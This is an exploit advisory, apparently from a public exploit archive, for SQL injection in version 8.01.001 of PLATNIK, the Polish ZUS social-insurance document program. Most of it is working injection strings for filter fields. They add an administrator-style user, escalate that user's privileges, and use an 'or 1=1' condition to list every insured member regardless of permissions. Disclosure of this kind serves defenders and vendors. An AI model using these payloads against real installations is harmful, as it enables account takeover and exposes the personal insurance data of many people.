# Exploit Title: PLATNIK - SQL Injection Vulnerability
# Discovered by: podatnik386

Description:

PLATNIK is the official Polish program to support documents for the Social Insurance Company (pl. ZUS). The application includes several fields that are vulnerable to sql injection.

Vulnerable version:
8.01.001

http://www.platnik.info.pl/


EXPLOIT(Tested on MSSQL2005 Express):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#### Field: Administration/Dziennik-Archiwum dziennika operacji(Events) tab / filter field (<=, =>, <, >) 

<'YYYY-MM-DD') SQL_QUERY
   
FOR EXAMPLE 

How to add new user:
<'2010-02-28')INSERT INTO dbo.UZYTKOWNIK VALUES('LOGIN', 'TEST', 'TEST', 'password hash', '2010-02-28 15:46:48', null, 'A', null)--

How to increase user privileges:
<'2010-02-28')INSERT INTO dbo.UPRAWNIENIA VALUES(id_user, id_platnik)--

#### Field: Documents(ZUS ZSWA) tab / III-VI tab / filter field  - okres pracy(work period)
FOR EXAMPLE 

Show all insured members(query ignores the permissions assigned to the user):
<05-02-2010) or 1=1--  

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The manufacturer has been informed prior to publication(But they ignored the vulnerability).

//////////////////////////////////////